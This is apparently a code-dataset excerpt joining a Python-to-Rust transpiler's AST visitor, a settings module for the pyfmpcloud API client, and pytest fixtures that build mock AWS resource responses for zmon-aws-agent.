"Mult": 10, "Div": 10, "FloorDiv": 10, "Mod": 10,
"Add": 9, "Sub": 9,
"LShift": 8, "RShift": 8,
"BitAnd": 7,
"BitXor": 6,
"BitOr": 5,
"Eq": 4, "NotEq": 4, "Gt": 4, "GtE": 4, "Lt": 4, "LtE": 4,
# "Not": 3, (this would be right for Python, but not for Rust)
"And": 2,
"Or": 1,
}
# One bigger than any actual precedence. Use this to force parentheses
MAX_PRECEDENCE = 13
class RustGenerator(ast.NodeVisitor):
"""
Visitor of the Python AST which generates Rust code, streaming
it out to stdout.
"""
def __init__(self):
self.indent = 0
self.next_separator = ""
self.precedence = 0
self.in_aug_assign = False
self.variables = set()
self.mutable_vars = set()
def pretty(self):
return ' ' * self.indent
def add_pretty(self, increment: int):
self.indent += increment
def print_operator(self, op: str):
if self.in_aug_assign:
print(f" {op}= ", end='')
else:
print(f" {op} ", end='')
def parens_if_needed(self, op: str, visit):
# use precedence * 2 so we can add one to control less than or equal
prec = OPERATOR_PRECEDENCE[op] * 2
if prec < self.precedence:
print("(", end='')
old_prec = self.precedence
self.precedence = prec
visit()
self.precedence = old_prec
if prec < self.precedence:
print(")", end='')
def visit_FunctionDef(self, node):
# Analyse the variables in this function to see which need
# to be predeclared or marked as mutable
analyser = VariableAnalyser()
analyser.visit(node)
# function name
print(f"{self.pretty()}fn {node.name}(", end='')
# start with a clean set of variables
# (do we need to worry about nested functions?)
self.variables.clear()
self.mutable_vars = analyser.get_mutable_vars()
# function arg list
self.next_separator = ""
self.generic_visit(node.args)
# return value
if node.returns is not None:
typed = type_from_annotation(node.returns, "return")
print(f") -> {typed} {OPEN_BRACE}")
else:
print(") {")
self.add_pretty(1)
# start with any variable declarations
for (var, typed, default) in analyser.get_predeclared_vars():
self.variables.add(var)
print(f"{self.pretty()}let mut {var}: {typed} = {default};")
# body of the function
for expr in node.body:
self.visit(expr)
self.add_pretty(-1)
print(f"{self.pretty()}{CLOSE_BRACE}")
print()
# clean the set of variables. The names do not leak past here
self.variables.clear()
def visit_arg(self, node):
typed = type_from_annotation(node.annotation, node.arg)
mutable = "mut " if node.arg in self.mutable_vars else ""
print(f"{self.next_separator}{mutable}{node.arg}: {typed}", end='')
self.variables.add(node.arg)
self.next_separator = ", "
def visit_Expr(self, node):
print(f"{self.pretty()}", end='')
self.generic_visit(node)
print(";")
def visit_Return(self, node):
print(f"{self.pretty()}return ", end='')
self.generic_visit(node)
print(";")
def visit_Call(self, node):
if node.func.id == "print":
self.visit_Print(node)
else:
self.visit(node.func)
print("(", end='')
sep = ""
for a in node.args:
print(sep, end='')
self.visit(a)
sep = ", "
print(")", end='')
def visit_Print(self, node):
"""
Not part of the standard visitor pattern, but internally
special-cased, because Rust print is quite different from
Python.
"""
# detect end= override
endline = None
sep = None
for k in node.keywords:
if k.arg == "end":
endline = k.value
elif k.arg == "sep":
sep = k.value
n = len(node.args)
if n == 0:
if not endline:
print("println!();")
else:
for i, arg in enumerate(node.args):
if i != 0:
print("print!(", end='')
if sep:
self.visit(sep)
else:
print('" "', end='')
print(");")
if i == n - 1 and not endline:
print("println!(", end='')
else:
print("print!(", end='')
self.visit(arg)
print(");")
# for now, we assume that the override sets end to ''
def visit_Name(self, node):
print(f"{node.id}", end='')
def visit_NameConstant(self, node):
val = node.value
if val in REPLACE_CONSTANTS:
val = REPLACE_CONSTANTS[node.value]
print(f"{val}", end='')
def visit_Str(self, node):
print(f'"{node.s}"', end='')
def visit_Num(self, node):
print(f"{node.n}", end='')
def visit_BinOp(self, node):
# some binary operators such as '+' translate
# into binary operators in Rust. However, pow needs
# special handling.
op = node.op.__class__.__name__
if op == "Pow":
self.visit_PowOp(node)
else:
self.parens_if_needed(op, lambda: self.do_visit_BinOp(node))
def do_visit_BinOp(self, node):
self.visit(node.left)
self.visit(node.op)
self.precedence += 1 # left to right associative
self.visit(node.right)
self.precedence -= 1
def visit_PowOp(self, node):
"""
Not a standard visitor function, but one we invoke
to handle the Pow operator "**"
"""
# ensure that any contained expression gets wrapped in
# parentheses
old_prec = self.precedence
self.precedence = MAX_PRECEDENCE * 2
# TODO decide between pow, powf and powi on the basis of type
# For now, assume the arguments are integer (i64). Note that
# Rust requires the rhs to be unsigned.
self.visit(node.left)
print(".pow((", end='')
self.precedence = 0 # already have parentheses
self.visit(node.right)
print(") as u32)", end='')
self.precedence = old_prec
def visit_Add(self, node):
self.print_operator("+")
def visit_Mult(self, node):
self.print_operator("*")
def visit_Sub(self, node):
self.print_operator("-")
def visit_Div(self, node):
# print("warning: floating point division", file=sys.stderr)
self.print_operator("/")
def visit_FloorDiv(self, node):
# print("warning: integer division", file=sys.stderr)
self.print_operator("/")
def visit_Mod(self, node):
# print("warning: Python mod operator is different from Rust")
self.print_operator("%")
# def visit_Pow(self, node):
# print("pow", end='')
def visit_LShift(self, node):
self.print_operator("<<")
def visit_RShift(self, node):
self.print_operator(">>")
def visit_BitOr(self, node):
self.print_operator("|")
def visit_BitXor(self, node):
self.print_operator("^")
def visit_BitAnd(self, node):
self.print_operator("&")
def visit_UnaryOp(self, node):
op = node.op.__class__.__name__
self.parens_if_needed(op, lambda: self.generic_visit(node))
def visit_UAdd(self, node):
"""
There is no unary addition operator in Rust. Just omit it
as it is a no-op
"""
pass
def visit_USub(self, node):
print("-", end='')
def visit_Not(self, node):
print("!", end='')
def visit_Invert(self, node):
"""
In Python the bitwise inversion operator "~" is distinct
from boolean negation. This is not the case in Rust.
"""
print("!", end='')
def visit_BoolOp(self, node):
op = node.op.__class__.__name__
self.parens_if_needed(op, lambda: self.do_visit_BoolOp(node))
def do_visit_BoolOp(self, node):
"""
Invoked by visit_BoolOp to do the work apart from the parens
"""
first = True
for v in node.values:
if not first:
self.visit(node.op)
self.visit(v)
first = False
def visit_And(self, node):
print(" && ", end='')
def visit_Or(self, node):
print(" || ", end='')
def visit_Compare(self, node):
"""
Invoked for any comparison operator such as <, >, ==.
Note that multiple comparisons in Rust are very different from
Python. In Rust, it is not permissible to write "a X b Y c"
where X and Y are comparison operators (possibly the same one).
In Python, this is shorthand for "(a X b) and (b Y c). We
therefore expand it like this in the Rust.
"""
op_len = len(node.ops)
assert(op_len == len(node.comparators))
if op_len > 1:
print("(", end='')
self.visit(node.left)
for op, c, i in zip(node.ops, node.comparators, range(op_len)):
# we do not yet handle is or in
assert(op.__class__.__name__ in ALLOWED_COMPARISON_OPERATORS)
self.visit(op)
self.visit(c)
if op_len > 1:
if i != op_len - 1:
print(") && (", end='')
self.visit(c)
else:
print(")", end='')
def visit_Eq(self, node):
print(" == ", end='')
def visit_NotEq(self, node):
print(" != ", end='')
def visit_Lt(self, node):
print(" < ", end='')
def visit_LtE(self, node):
print(" <= ", end='')
def visit_Gt(self, node):
print(" > ", end='')
def visit_GtE(self, node):
print(" >= ", end='')
def visit_IfExp(self, node):
print("if ", end='')
self.visit(node.test)
print(" { ", end='')
self.visit(node.body)
print(" } else { ", end='')
self.visit(node.orelse)
print(" }", end='')
def visit_If(self, node):
print(f"{self.pretty()}if ", end='')
self.visit(node.test)
print(" {")
self.add_pretty(1)
for line in node.body:
self.visit(line)
self.add_pretty(-1)
if node.orelse:
print(f"{self.pretty()}{CLOSE_BRACE} else {OPEN_BRACE}")
self.add_pretty(1)
for line in node.orelse:
self.visit(line)
self.add_pretty(-1)
print(f"{self.pretty()}{CLOSE_BRACE}")
def visit_While(self, node):
print(f"{self.pretty()}while ", end='')
self.visit(node.test)
print(" {")
self.add_pretty(1)
for line in node.body:
self.visit(line)
self.add_pretty(-1)
assert(len(node.orelse) == 0)
print(f"{self.pretty()}{CLOSE_BRACE}")
def visit_For(self, node):
print(f"{self.pretty()}for ", end='')
self.visit(node.target)
print(" in ", end='')
self.visit(node.iter)
print(" {")
self.add_pretty(1)
for line in node.body:
self.visit(line)
self.add_pretty(-1)
assert(len(node.orelse) == 0)
print(f"{self.pretty()}{CLOSE_BRACE}")
def visit_Break(self, node):
print(f"{self.pretty()}break;")
def visit_Continue(self, node):
print(f"{self.pretty()}continue;")
def visit_Assign(self, node):
"""
Variable assignment statement, such as x = y = 42
Note that Rust does not handle multiple assignments on one
line, so we write a line for each one.
"""
first = True
for target in node.targets:
# treatment depends on whether it is the first time we
# have seen this variable. (Do not use shadowing.)
name = target.id
if name in self.variables:
print(f"{self.pretty()}", end='')
else:
mutable = "mut " if name in self.mutable_vars else ""
print(f"{self.pretty()}let {mutable}", end='')
self.variables.add(name)
self.visit(target)
print(" = ", end='')
if first:
self.visit(node.value)
first_name = name
first = False
else:
# only evaluate expression once
print(f" = {first_name}", end='')
print(";")
def visit_AnnAssign(self, node):
"""
Hinted variable assignment statement, such as x: int = 42
We do not yet handle non-simple assignments such as
(x): int = 42
"""
# treatment depends on whether it is the first time we
# have seen this variable. (Do not use shadowing.)
name = node.target.id
if name in self.variables:
print(f"{self.pretty()}", end='')
else:
mutable = "mut " if name in self.mutable_vars else ""
print(f"{self.pretty()}let {mutable}", end='')
self.variables.add(name)
self.visit(node.target)
typed = type_from_annotation(node.annotation, node.target)
print(f": {typed} = ", end='')
self.visit(node.value)
print(";")
def visit_AugAssign(self, node):
print(self.pretty(), end='')
self.visit(node.target)
self.in_aug_assign = True
self.visit(node.op)
self.in_aug_assign = False
self.visit(node.value)
print(";")
def test_compiler(filename: str):
input_filename = f"tests/{filename}.py"
output_filename = f"temp/{filename}.ru"
baseline_filename = f"baseline/{filename}.ru"
input_file = open(input_filename, 'r')
source = input_file.read()
input_file.close()
output_file = open(output_filename, 'w')
old_stdout = sys.stdout
sys.stdout = output_file
tree = ast.parse(source, filename, 'exec')
RustGenerator().visit(tree)
output_file.close()
sys.stdout = old_stdout
ok = filecmp.cmp(baseline_filename, output_filename, shallow=False)
if ok:
print(f"test {filename} succeeded")
os.remove(output_filename)
else:
print(f"test {filename} failed. Output file {output_filename} left in place.")
if __name__ == "__main__":
test_compiler("hello_world")
test_compiler("add_mult")
test_compiler("flow_of_control")
test_compiler("variables")
``` |
{
"source": "jraisher/pyfmpcloud",
"score": 2
} |
#### File: pyfmpcloud/pyfmpcloud/settings.py
```python
import configparser
import os
cfile = os.path.join(os.path.dirname(__file__), 'config.ini')
cfg = configparser.ConfigParser()
cfg.read(cfile)
# has_section() returns False rather than raising when the file was not read,
# so check the result explicitly
if not cfg.has_section('API'):
raise Exception('Config File was not read.')
def get_urlroot():
urlroot = cfg['API']['url_root']
return urlroot
def get_urlrootfmp():
urlrootfmp = cfg['API']['url_root_fmp']
return urlrootfmp
def get_apikey():
apikey = cfg['API']['api_key']
return apikey
def set_apikey(apikey):
cfg['API']['api_key'] = apikey
with open(cfile, 'w') as configfile:
cfg.write(configfile)
``` |
{
"source": "jrake-revelant/zmon-aws-agent",
"score": 2
} |
#### File: zmon-aws-agent/tests/conftest.py
```python
import json
import base64
from datetime import datetime
from dateutil.tz import tzutc
import pytest
from botocore.exceptions import ClientError
from zmon_aws_agent.aws import get_hash
ACCOUNT = '<KEY>'
REGION = 'eu-central-1'
class ThrottleError(ClientError):
def __init__(self, throttling=True):
self.throttling = throttling
self.response = {'Error': {'Code': 'Throttling' if throttling else 'BadRequest'}}
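# Mimics the response shape of a real botocore ClientError so that code paths
# inspecting Error.Code (e.g. throttling retries) can be exercised in tests.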
def get_elc_cluster():
cluster = {
'CacheClusterStatus': 'available',
'CacheClusterId': 'elc-1',
'Engine': 'redis',
'EngineVersion': '1.0.5',
'NumCacheNodes': 2,
'CacheNodeType': 'redis',
'ReplicationGroupId': 'elc-1-replica',
'CacheNodes': [
{
'CacheNodeStatus': 'available', 'CacheNodeId': 'elc-n-1',
'Endpoint': {'Port': 2727, 'Address': '0.0.0.0'}
},
{'CacheNodeStatus': 'unknown'}
]
}
resp = {
'CacheClusters': [cluster.copy() for i in range(4)]
}
statuses = ('available', 'modifying', 'snapshotting', 'unknown')
for idx, c in enumerate(resp['CacheClusters']):
c['CacheClusterStatus'] = statuses[idx]
node = {
'id': 'elc-elc-1-elc-n-1[{}:{}]'.format(ACCOUNT, REGION),
'region': REGION,
'created_by': 'agent',
'infrastructure_account': ACCOUNT,
'type': 'elc',
'cluster_id': 'elc-1',
'node_id': 'elc-n-1',
'engine': 'redis',
'version': '1.0.5',
'cluster_num_nodes': 2,
'host': '0.0.0.0',
'port': 2727,
'instance_type': 'redis',
'replication_group': 'elc-1-replica',
}
return resp, [node] * 3
def get_autoscaling():
asg = {
'AutoScalingGroupName': 'asg-1',
'AvailabilityZones': ['zone-1', 'zone-2'],
'DesiredCapacity': '3',
'MaxSize': 10,
'MinSize': 3,
'Instances': [
{'InstanceId': 'ins-1', 'LifecycleState': 'InService'},
{'InstanceId': 'ins-2', 'LifecycleState': 'InService'},
{'InstanceId': 'ins-3', 'LifecycleState': 'InService'},
{'InstanceId': 'ins-4', 'LifecycleState': 'unknown'},
],
'CreatedTime': datetime(2018, 6, 6, 9, 59, 38, 127000, tzinfo=tzutc())
}
reservations = {
'Reservations': [
{
'Instances': [
{'PrivateIpAddress': '192.168.20.16', 'InstanceId': 'ins-1'},
{'InstanceId': 'ins-2'}
]
}
]
}
instance_ids = ['ins-1', 'ins-2', 'ins-3']
resp = {
'AutoScalingGroups': [asg]
}
result = [
{
'id': 'asg-asg-1[{}:{}]'.format(ACCOUNT, REGION),
'type': 'asg',
'infrastructure_account': ACCOUNT,
'region': REGION,
'created_by': 'agent',
'name': 'asg-1',
'availability_zones': ['zone-1', 'zone-2'],
'desired_capacity': '3',
'max_size': 10,
'min_size': 3,
'instances': [{'aws_id': 'ins-1', 'ip': '192.168.20.16'}],
'created_time': '2018-06-06 09:59:38.127000'
}
]
return resp, reservations, instance_ids, result
def get_elbs():
resp = {
'LoadBalancerDescriptions': [
{
'LoadBalancerName': 'elb-1',
'DNSName': 'elb-1.example.org',
'Scheme': 'https',
'Instances': ['ins-1', 'ins-2', 'ins-3'],
'ListenerDescriptions': [{'Listener': {'Protocol': 'HTTPS'}}],
},
]
}
tags = {'TagDescriptions': [{'LoadBalancerName': 'elb-1'}]}
health = {
'InstanceStates': [
{'State': 'InService'},
{'State': 'InService'},
{'State': 'OutOfService'},
]
}
result = [
{
'id': 'elb-elb-1[{}:{}]'.format(ACCOUNT, REGION),
'type': 'elb',
'infrastructure_account': ACCOUNT,
'region': REGION,
'created_by': 'agent',
'elb_type': 'classic',
'dns_name': 'elb-1.example.org',
'host': 'elb-1.example.org',
'name': 'elb-1',
'scheme': 'https',
'url': 'https://elb-1.example.org',
'members': 3,
'active_members': 2,
}
]
return resp, tags, health, result
def get_elbs_application():
resp = {
'LoadBalancers': [
{
'LoadBalancerArn': 'arn-/app/elb-1/123456',
'LoadBalancerName': 'elb-1',
'DNSName': 'elb-1.example.org',
'Scheme': 'internal',
}
]
}
listeners = {
'Listeners': [{'Protocol': 'HTTP'}]
}
tags = {'TagDescriptions': [{'ResourceArn': 'arn-/app/elb-1/123456', 'Tags': []}]}
groups = {'TargetGroups': [{'TargetGroupArn': 'arn-group-1-elb-1'}]}
health = {
'TargetHealthDescriptions': [
{'TargetHealth': {'State': 'healthy'}},
{'TargetHealth': {'State': 'healthy'}},
{'TargetHealth': {'State': 'terminated'}},
]
}
result = [
{
'id': 'elb-elb-1[{}:{}]'.format(ACCOUNT, REGION),
'type': 'elb',
'infrastructure_account': ACCOUNT,
'region': REGION,
'created_by': 'agent',
'elb_type': 'application',
'dns_name': 'elb-1.example.org',
'host': 'elb-1.example.org',
'cloudwatch_name': 'app/elb-1/123456',
'name': 'elb-1',
'scheme': 'internal',
'url': 'http://elb-1.example.org',
'members': 3,
'active_members': 2,
'target_groups': 1,
'target_groups_arns': ['arn-group-1-elb-1'],
}
]
return resp, tags, listeners, groups, health, result
def get_apps():
resp = {
'Reservations': [
{
'OwnerId': '1234',
'Instances': [
{
'State': {'Name': 'running'},
'PrivateIpAddress': '192.168.20.16', 'PublicIpAddress': '192.168.3.11',
'InstanceType': 't2.medium', 'InstanceId': 'ins-1', 'StateTransitionReason': 'state',
'InstanceLifecycle': 'spot',
'Placement': {'AvailabilityZone': 'eu-central-1a'},
'Tags': [
{'Key': 'Name', 'Value': 'stack-1'}, {'Key': 'StackVersion', 'Value': 'stack-1-1.0'},
{'Key': 'aws:cloudformation:logical-id', 'Value': 'cd-app'}
],
'ImageId': 'ami-1234',
},
{
'State': {'Name': 'running'},
'PrivateIpAddress': '192.168.20.16',
'Placement': {'AvailabilityZone': 'eu-central-1b'},
'InstanceType': 't2.medium', 'InstanceId': 'ins-2', 'StateTransitionReason': 'state'
},
{
'State': {'Name': 'terminated'},
},
{
'State': {'Name': 'running'},
'PrivateIpAddress': '192.168.20.17',
'Placement': {'AvailabilityZone': 'eu-central-1c'},
'InstanceType': 't2.medium', 'InstanceId': 'ins-3', 'StateTransitionReason': 'state',
'Tags': [
{'Key': 'Name', 'Value': 'myname'}
]
},
],
}
]
}
status_resp = {'InstanceStatuses': [{'Events': ['ev-1', 'ev-2']}]}
user_data = [
{
'application_id': 'app-1', 'source': 'registry/stups/zmon-aws-agent:cd81',
'ports': [2222], 'runtime': 'docker',
'application_version': '1.0',
'logging': {
'fluentd_enabled': True,
'log_destination': 's3'
},
},
{
'no-appliacation-id': 'dummy'
}
]
user_resp = [{'UserData': {'Value': base64.encodebytes(bytes(json.dumps(u), 'utf-8'))}} for u in user_data]
result = [
{
'id': 'app-1-stack-1-1.0-{}[{}:{}]'.format(get_hash('192.168.20.16'), ACCOUNT, REGION),
'type': 'instance', 'created_by': 'agent', 'region': REGION, 'infrastructure_account': 'aws:1234',
'ip': '192.168.20.16', 'host': '192.168.20.16', 'public_ip': '192.168.3.11',
'instance_type': 't2.medium', 'availability_zone': 'eu-central-1a', 'aws_id': 'ins-1',
'fluentd_enabled': 'true', 'state_reason': 'state', 'stack': 'stack-1', 'stack_version': 'stack-1-1.0',
'resource_id': 'cd-app', 'application_id': 'app-1', 'application_version': '1.0',
'source': 'registry/stups/zmon-aws-agent:cd81', 'source_base': 'registry/stups/zmon-aws-agent',
'ports': [2222], 'runtime': 'docker', 'aws:cloudformation:logical_id': 'cd-app', 'name': 'stack-1',
'events': ['ev-1', 'ev-2'], 'spot_instance': True, 'block_devices': {}, 'image': {
'id': 'ami-1234',
'name': 'Taupage-AMI-20170512-142225',
'date': '2017-05-12T14:22:25.000+00:00',
},
},
{
'id': 'ins-2-{}[{}:{}]'.format(get_hash('192.168.20.16'), ACCOUNT, REGION),
'type': 'instance', 'created_by': 'agent', 'region': REGION, 'infrastructure_account': 'aws:1234',
'ip': '192.168.20.16', 'host': '192.168.20.16', 'spot_instance': False,
'instance_type': 't2.medium', 'availability_zone': 'eu-central-1b', 'aws_id': 'ins-2',
'block_devices': {}, 'image': {},
},
{
'id': 'myname-{}[{}:{}]'.format(get_hash('192.168.20.17'), ACCOUNT, REGION),
'type': 'instance', 'created_by': 'agent', 'region': REGION, 'infrastructure_account': 'aws:1234',
'ip': '192.168.20.17', 'host': '192.168.20.17', 'spot_instance': False,
'instance_type': 't2.medium', 'availability_zone': 'eu-central-1c', 'aws_id': 'ins-3', 'name': 'myname',
'block_devices': {}, 'image': {},
}
]
images = {
'Images': [
{
"Name": "Taupage-AMI-20170512-142225",
"ImageId": "ami-1234",
"CreationDate": "2017-05-12T14:22:25.000Z",
}
]
}
return resp, status_resp, user_resp, result, images
def get_apps_existing():
resp = {
'Reservations': [
{
'OwnerId': '1234',
'Instances': [
{
'State': {'Name': 'running'},
'PrivateIpAddress': '192.168.20.16', 'PublicIpAddress': '192.168.3.11',
'Placement': {'AvailabilityZone': 'eu-central-1a'},
'InstanceType': 't2.medium', 'InstanceId': 'ins-1', 'StateTransitionReason': 'state',
'InstanceLifecycle': 'spot',
'Tags': [
{'Key': 'Name', 'Value': 'stack-1'}, {'Key': 'StackVersion', 'Value': 'stack-1-1.0'},
{'Key': 'aws:cloudformation:logical-id', 'Value': 'cd-app'}
],
},
{
'State': {'Name': 'running'},
'PrivateIpAddress': '192.168.20.16',
'Placement': {'AvailabilityZone': 'eu-central-1b'},
'InstanceType': 't2.medium', 'InstanceId': 'ins-2', 'StateTransitionReason': 'state'
},
{
'State': {'Name': 'terminated'},
},
{
'State': {'Name': 'running'},
'PrivateIpAddress': '192.168.20.17',
'Placement': {'AvailabilityZone': 'eu-central-1c'},
'InstanceType': 't2.medium', 'InstanceId': 'ins-3', 'StateTransitionReason': 'state',
'Tags': [
{'Key': 'Name', 'Value': 'myname'}
]
},
],
}
]
}
status_resp = {'InstanceStatuses': [{'Events': ['ev-1', 'ev-2']}]}
user_data = [
{
'application_id': 'app-1', 'source': 'registry/stups/zmon-aws-agent:cd81',
'ports': [2222], 'runtime': 'docker',
'application_version': '1.0',
},
{
'no-appliacation-id': 'dummy'
}
]
user_resp = [{'UserData': {'Value': base64.encodebytes(bytes(json.dumps(u), 'utf-8'))}} for u in user_data]
result = [
{
'id': 'app-1-stack-1-1.0-{}[{}:{}]'.format(get_hash('192.168.20.16'), ACCOUNT, REGION),
'type': 'instance', 'created_by': 'agent', 'region': REGION, 'infrastructure_account': 'aws:1234',
'ip': '192.168.20.16', 'host': '192.168.20.16', 'public_ip': '192.168.3.11',
'instance_type': 't2.medium', 'availability_zone': 'eu-central-1a', 'aws_id': 'ins-1',
'fluentd_enabled': 'false', 'state_reason': 'state', 'stack': 'stack-1', 'stack_version': 'stack-1-1.0',
'resource_id': 'cd-app', 'application_id': 'app-1', 'application_version': '1.0',
'source': 'registry/stups/zmon-aws-agent:cd81', 'source_base': 'registry/stups/zmon-aws-agent',
'ports': [2222], 'runtime': 'docker', 'aws:cloudformation:logical_id': 'cd-app', 'name': 'stack-1',
'events': [], 'spot_instance': True, 'block_devices': {}, 'image': {},
},
{
'id': 'ins-2-{}[{}:{}]'.format(get_hash('192.168.20.16'), ACCOUNT, REGION),
'type': 'instance', 'created_by': 'agent', 'region': REGION, 'infrastructure_account': 'aws:1234',
'ip': '192.168.20.16', 'host': '192.168.20.16', 'spot_instance': False,
'instance_type': 't2.medium', 'availability_zone': 'eu-central-1b', 'aws_id': 'ins-2',
'block_devices': {}, 'image': {},
},
{
'id': 'myname-{}[{}:{}]'.format(get_hash('192.168.20.17'), ACCOUNT, REGION),
'type': 'instance', 'created_by': 'agent', 'region': REGION, 'infrastructure_account': 'aws:1234',
'ip': '192.168.20.17', 'host': '192.168.20.17', 'spot_instance': False,
'instance_type': 't2.medium', 'availability_zone': 'eu-central-1c', 'aws_id': 'ins-3', 'name': 'myname',
'block_devices': {}, 'image': {},
}
]
return resp, status_resp, user_resp, result
def get_certificates():
resp_iam = {
'ServerCertificateMetadataList': [
{
'Arn': 'arn-iam-zmon-cert-1',
'Expiration': datetime(2023, 4, 26, 0, 0),
'Path': '/',
'ServerCertificateId': '123456',
'ServerCertificateName': 'zmon-cert-1',
'UploadDate': datetime(2016, 4, 27, 11, 8, 50)
}
]
}
resp_acm = {
'CertificateSummaryList': [
{
'CertificateArn': 'arn-acm-zmon-cert-2/2-123',
'DomainName': 'zmon-cert-2',
},
{
'CertificateArn': 'arn-acm-zmon-cert-3/3-123',
'DomainName': 'zmon-cert-3',
},
{
'CertificateArn': 'arn-acm-zmon-cert-4/4-123',
'DomainName': 'zmon-cert-4',
},
]
}
acm_certs = [
{
'Certificate': {
'DomainName': 'zmon-cert-2',
'CertificateArn': 'arn-acm-zmon-cert-2/2-123',
'Status': 'ISSUED',
'NotAfter': datetime(2023, 4, 26, 0, 0),
'InUseBy': ['abc', 'def'],
'DomainValidationOptions': [
{
"ValidationStatus": "SUCCESS",
"ValidationDomain": "zmon-cert-2",
"ValidationMethod": "EMAIL",
"DomainName": "zmon-cert-2"
}
]
}
},
{
'Certificate': {
'DomainName': 'zmon-cert-3',
'CertificateArn': 'arn-acm-zmon-cert-3/3-123',
'Status': 'VALIDATION_TIMED_OUT',
'InUseBy': ['abc', 'def'],
'DomainValidationOptions': [
{
"ValidationStatus": "FAILED",
"ValidationMethod": "DNS",
"DomainName": "zmon-cert-3"
},
{
"ValidationStatus": "SUCCESS",
"ValidationMethod": "DNS",
"DomainName": "zmon-cert-3"
}
]
}
},
{
'Certificate': {
'DomainName': 'zmon-cert-4',
'CertificateArn': 'arn-acm-zmon-cert-4/4-123',
'Status': 'ISSUED',
'NotAfter': datetime(2023, 4, 26, 0, 0),
'InUseBy': [],
'DomainValidationOptions': [
{
"ValidationStatus": "SUCCESS",
"ValidationDomain": "zmon-cert-4",
"ValidationMethod": "EMAIL",
"DomainName": "zmon-cert-4"
},
{
"ValidationStatus": "PENDING_VALIDATION",
"ValidationDomain": "zmon-cert-4",
"ValidationMethod": "EMAIL",
"DomainName": "zmon-cert-4"
}
]
}
},
]
result = [
{
'type': 'certificate', 'status': 'ISSUED', 'region': REGION, 'arn': 'arn-iam-zmon-cert-1',
'certificate_type': 'iam', 'id': 'cert-iam-zmon-cert-1[{}:{}]'.format(ACCOUNT, REGION),
'infrastructure_account': ACCOUNT, 'expiration': '2023-04-26T00:00:00',
'created_by': 'agent', 'name': 'zmon-cert-1', 'in_use': 'true',
},
{
'type': 'certificate', 'status': 'ISSUED', 'region': REGION, 'arn': 'arn-acm-zmon-cert-2/2-123',
'certificate_type': 'acm', 'id': 'cert-acm-2-123-zmon-cert-2[{}:{}]'.format(ACCOUNT, REGION),
'infrastructure_account': ACCOUNT, 'expiration': '2023-04-26T00:00:00',
'created_by': 'agent', 'name': 'zmon-cert-2', 'in_use': 'true',
'validation_method': 'EMAIL',
'validation_status': 'SUCCESS',
},
{
'type': 'certificate', 'status': 'VALIDATION_TIMED_OUT', 'region': REGION,
'arn': 'arn-acm-zmon-cert-3/3-123', 'certificate_type': 'acm',
'id': 'cert-acm-3-123-zmon-cert-3[{}:{}]'.format(ACCOUNT, REGION), 'infrastructure_account': ACCOUNT,
'expiration': '', 'created_by': 'agent', 'name': 'zmon-cert-3', 'in_use': 'true',
'validation_method': 'DNS',
'validation_status': 'FAILED',
},
{
'type': 'certificate', 'status': 'ISSUED', 'region': REGION, 'arn': 'arn-acm-zmon-cert-4/4-123',
'certificate_type': 'acm', 'id': 'cert-acm-4-123-zmon-cert-4[{}:{}]'.format(ACCOUNT, REGION),
'infrastructure_account': ACCOUNT, 'expiration': '2023-04-26T00:00:00',
'created_by': 'agent', 'name': 'zmon-cert-4', 'in_use': 'false',
'validation_method': 'EMAIL',
'validation_status': 'PENDING_VALIDATION',
}
]
return resp_iam, resp_acm, acm_certs, result
@pytest.fixture(params=[
(
{
'DBInstances': [
{
'DBInstanceIdentifier': 'db-1', 'Engine': 'e-1', 'Endpoint': {'Port': 5432, 'Address': '0.0.0.0'},
'DBInstanceClass': 'm4.xlarge', 'StorageType': 'gp2', 'AllocatedStorage': 100
},
{
'DBInstanceIdentifier': 'db-2', 'Engine': 'e-1', 'Endpoint': {'Port': 5432, 'Address': '0.0.0.0'},
'EngineVersion': '1.0.2', 'DBName': 'db-2-name', 'DBInstanceClass': 'm4.xlarge',
'AllocatedStorage': 500
},
]
},
[
{
'id': 'rds-db-1[{}]', 'name': 'db-1', 'engine': 'e-1', 'port': 5432, 'host': '0.0.0.0',
'type': 'database', 'shards': {'db-1': '0.0.0.0:5432/db-1'}, 'instance_type': 'm4.xlarge',
'storage_type': 'gp2', 'storage_size': 100
},
{
'id': 'rds-db-2[{}]', 'name': 'db-2', 'engine': 'e-1', 'port': 5432, 'host': '0.0.0.0',
'type': 'database', 'version': '1.0.2', 'shards': {'db-2-name': '0.0.0.0:5432/db-2-name'},
'instance_type': 'm4.xlarge', 'storage_type': '', 'storage_size': 500
},
]
),
(
RuntimeError,
[]
)
])
def fx_rds(request):
return request.param
@pytest.fixture(params=[
(
{
'TableNames': ['t-1', 't-2', 't-3'] # paginator
},
[
{'Table': {'TableStatus': 'ACTIVE', 'TableName': 't-1', 'TableArn': 'aws.t-1'}},
{'Table': {'TableStatus': 'UPDATING', 'TableName': 't-2', 'TableArn': 'aws.t-2'}},
{'Table': {'TableStatus': 'INACTIVE', 'TableName': 't-3', 'TableArn': 'aws.t-3'}}, # describe table
],
[
{'id': 'dynamodb-t-1[{}:{}]', 'type': 'dynamodb', 'name': 't-1', 'arn': 'aws.t-1'},
{'id': 'dynamodb-t-2[{}:{}]', 'type': 'dynamodb', 'name': 't-2', 'arn': 'aws.t-2'}, # result
]
),
(
RuntimeError,
[],
[]
)
])
def fx_dynamodb(request):
return request.param
def get_ec2_service_quotas():
quotas = {
'Quotas': [
{
"ServiceCode": "ec2",
"ServiceName": "Amazon Elastic Compute Cloud (Amazon EC2)",
"QuotaArn": "arn:aws:servicequotas:eu-west-1:170858875137:ec2/L-7295265B",
"QuotaCode": "L-7295265B",
"QuotaName": "Running On-Demand X instances",
"Value": 548.0,
"Unit": "None",
"Adjustable": True,
"GlobalQuota": False,
"UsageMetric": {
"MetricNamespace": "AWS/Usage",
"MetricName": "ResourceCount",
"MetricDimensions": {
"Class": "X/OnDemand",
"Resource": "vCPU",
"Service": "EC2",
"Type": "Resource"
},
"MetricStatisticRecommendation": "Maximum"
}
},
{
"ServiceCode": "ec2",
"ServiceName": "Amazon Elastic Compute Cloud (Amazon EC2)",
"QuotaArn": "arn:aws:servicequotas:eu-west-1:170858875137:ec2/L-E4BF28E0",
"QuotaCode": "L-E4BF28E0",
"QuotaName": "Running On-Demand c4 hosts",
"Value": 2.0,
"Unit": "None",
"Adjustable": True,
"GlobalQuota": False
}
]
}
existing = [
{
"arn": "arn:aws:servicequotas:eu-west-1:170858875137:ec2/L-FOOBAR",
"code": "L-FOOBAR",
"name": "Example",
"created_by": "agent",
"id": "aws_servicequota-ec2-l-foobar[aws:1234:eu-central-1]",
"infrastructure_account": "aws:1234",
"region": "eu-central-1",
"service": "ec2",
"type": "aws_servicequota",
"value": 111
}
]
